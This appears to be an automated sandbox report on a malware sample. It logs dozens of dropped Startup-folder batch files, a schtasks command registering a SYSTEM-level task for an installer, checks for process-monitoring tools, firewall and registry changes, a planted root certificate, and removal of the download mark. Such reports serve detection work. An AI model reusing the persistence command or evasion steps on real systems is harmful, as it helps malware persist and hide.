Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WfwAozSpYoRh0VfEDamYiBsR.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4lG8OjDaPfGRBHmxDRRVnuFX.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsGva5E6VHjdUQqf5f96rHfC.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2zxQMcxXAdjZW6YdcXWRkkOC.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7TQPiLaiOp4J0vvxRaQJgnEq.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8acF06oTPket8RN9OHo9AhQC.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LD4hNojEUEziyKrYgWhQk5rm.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\txcp0mnex1Rnt92zIdFfbI0y.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\w7u98nz6M4xUaPLHp2FQ8cKh.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YnNYj3NsWtyv1mUxqNvcXDCG.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NF17SuJC2X4gjmjhKys98Qxu.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QiP2pWLr6NBQvOLbwQTTyn6C.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BWeUEkKv96FAORobAHCW6ypF.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OiFswMERSIM5QYpzdzXs8HqN.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wgc7DyRQRZGZ91fWhoYDAYbz.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4NTnGOUpjOPuN9Xvi5JMQBJ.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7uBTIqAI4TFaoTgWHqBwwXI.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\66nsVpLcdQEIzffvQGAD01Wx.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mzNuu3a0I49mMXBViscfANRg.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a0N7wfHYhrlqZ4SvtOhtcxTC.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\P8Y5HAG12fYTb8t4PcK7rKlv.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\70kdhy3RjJy5GS3eqVG34cMz.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7n1DOJlzDKyVx2HRsxGMDCQe.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\63M9nLrRjxludNRrfdaZddPt.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vD42lBWTRgzN6MsiYDmXUaxN.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LPtepEDzI9Rnp2fhv2mNTraW.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GCxOPoVfvPyhMjrPUVz65iw0.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fp4XGOFNreU9QQvFxWGD280g.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PFtTOLsGyXAF8UN7SK2yoXrT.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yx7mEUrFnFwXRMEpkyGWl1Pr.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b5QOFtze6kWQIzQsICnW3Y23.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HtVik0gCCXpMbW1ewQEIafJO.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vtoFw8ASSHe6FVnWEsT9Qpir.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JA9IiDRirqHyvko4OfQivGZ7.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3r3iI3aD5uoVkmnpNwglczar.bat	Jump to dropped file

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xInHqHgRkuPGfp5esHw9Po4t.bat

Jump to behavior

Creates job files (autostart)

Source: C:\Windows\SysWOW64\schtasks.exe

File created: C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job

Creates or modifies windows services

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules

Modifies existing windows services

Source: C:\Windows\System32\svchost.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config

Stores files to the Windows start menu directory

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xInHqHgRkuPGfp5esHw9Po4t.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uM7NrUar2CHMPPLhTaEGJaiv.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9KovXimwlIyW3P77uFXo41ye.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BsDz5LTErOmd8yNfyBTmMVUZ.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WfwAozSpYoRh0VfEDamYiBsR.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4lG8OjDaPfGRBHmxDRRVnuFX.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LD4hNojEUEziyKrYgWhQk5rm.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\w7u98nz6M4xUaPLHp2FQ8cKh.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QiP2pWLr6NBQvOLbwQTTyn6C.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BWeUEkKv96FAORobAHCW6ypF.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OiFswMERSIM5QYpzdzXs8HqN.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\70kdhy3RjJy5GS3eqVG34cMz.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vD42lBWTRgzN6MsiYDmXUaxN.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JA9IiDRirqHyvko4OfQivGZ7.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tEJmB2nPjyQy45rj4ea5hhl3.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsh82zoYXoBpPEndu5XVvQbj.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mttZ30v22cES8SbTv1OgQiYx.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ixTCqmFJu5C2WAuYjLa75esH.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsGva5E6VHjdUQqf5f96rHfC.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2zxQMcxXAdjZW6YdcXWRkkOC.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7TQPiLaiOp4J0vvxRaQJgnEq.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8acF06oTPket8RN9OHo9AhQC.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\txcp0mnex1Rnt92zIdFfbI0y.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YnNYj3NsWtyv1mUxqNvcXDCG.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NF17SuJC2X4gjmjhKys98Qxu.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wgc7DyRQRZGZ91fWhoYDAYbz.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4NTnGOUpjOPuN9Xvi5JMQBJ.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7uBTIqAI4TFaoTgWHqBwwXI.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\66nsVpLcdQEIzffvQGAD01Wx.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mzNuu3a0I49mMXBViscfANRg.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a0N7wfHYhrlqZ4SvtOhtcxTC.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\P8Y5HAG12fYTb8t4PcK7rKlv.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7n1DOJlzDKyVx2HRsxGMDCQe.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\63M9nLrRjxludNRrfdaZddPt.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LPtepEDzI9Rnp2fhv2mNTraW.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GCxOPoVfvPyhMjrPUVz65iw0.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fp4XGOFNreU9QQvFxWGD280g.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PFtTOLsGyXAF8UN7SK2yoXrT.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yx7mEUrFnFwXRMEpkyGWl1Pr.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b5QOFtze6kWQIzQsICnW3Y23.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HtVik0gCCXpMbW1ewQEIafJO.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vtoFw8ASSHe6FVnWEsT9Qpir.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3r3iI3aD5uoVkmnpNwglczar.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CpI1BxUwX4GXv0UQgqj98YFq.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dH9ICyXokcwnq5IDiow3vkKB.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1Ub2k1IJ2t5gUNZveaJnsLim.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lfz7DVXioZ89NNQKMlyzk5D1.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TH2edQjI5N96cctLqxcxRWB4.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lRYDXj1XORWa1yGwgqL1xUtR.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gov6rjgDZRJhjjWExECEmd4R.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fDdDwjmSMhosQx3rLX3Nv89G.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tYY0jrXY77oGwO5gH1VTslTu.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bzhtqiaIEnooSzQ58KPkDsXr.bat	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\hvfsedh:Zone.Identifier read attributes | delete

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Stores large binary data to the registry

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 Blob

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
